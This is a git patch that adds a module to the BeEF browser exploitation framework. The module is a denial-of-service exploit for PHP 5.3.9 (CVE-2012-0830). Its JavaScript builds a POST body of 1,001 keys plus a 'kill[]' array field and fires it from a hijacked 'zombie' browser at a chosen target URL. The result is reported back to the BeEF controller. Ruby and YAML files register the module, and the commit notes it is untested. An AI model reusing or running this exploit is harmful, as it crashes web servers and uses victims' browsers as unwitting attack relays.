From 75532ffe44efbc3235c4f6e6d953226edf82c073 Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 29 Nov 2012 18:34:07 +1030 Subject: [PATCH] Add PHP 5.3.9 DoS (CVE-2012-0830) module Has not been tested --- modules/exploits/php-5.3.9-dos/command.js | 52 ++++++++++++++++++++++ modules/exploits/php-5.3.9-dos/config.yaml | 15 +++++++ modules/exploits/php-5.3.9-dos/module.rb | 21 +++++++++ 3 files changed, 88 insertions(+) create mode 100644 modules/exploits/php-5.3.9-dos/command.js create mode 100644 modules/exploits/php-5.3.9-dos/config.yaml create mode 100644 modules/exploits/php-5.3.9-dos/module.rb diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js new file mode 100644 index 000000000..6f03ea12f --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/command.js @@ -0,0 +1,52 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + +// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830) +// PoC written by Paul Westin +// PoC ported to BeEF by bcoles +// Bug discovered by Stefan Esser (@i0n1c) +// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/ + +// Generate 1000 normal keys and one array +function createEvilObj () { + var evil_obj = {}; + for (var i = 0; i < 1001; i++) { + evil_obj[i] = 1; + } + evil_obj['kill[]'] = 'kill'; + return evil_obj; +} + +// Serialize Javascript object into POST data +function serializeObj (obj) { + var str = []; + for(var p in obj) { + str.push(p + "=" + obj[p]); + } + return str.join("&"); +} + +// Run attack +function attackSite (target_url) { + var bad = serializeObj(createEvilObj()); + var xhr = new XMLHttpRequest(); + xhr.open("POST", target_url, true); + xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); + xhr.setRequestHeader('Content-Length', bad.length); + xhr.send(bad); +} + +try { + attackSite("<%= @url %>"); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent"); +} catch (e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString()); +} + +}); + diff --git a/modules/exploits/php-5.3.9-dos/config.yaml b/modules/exploits/php-5.3.9-dos/config.yaml new file mode 100644 index 000000000..3617825ba --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + php_dos: + enable: true + category: "Exploits" + name: "PHP 5.3.9 DoS" + description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (CVE-2012-0830).

For more information, see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/." + authors: ["bcoles", "Paul Westin", "Stefan Esser"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb new file mode 100644 index 000000000..6044f3550 --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Php_dos < BeEF::Core::Command + + def self.options + return [ + {'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'} + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end +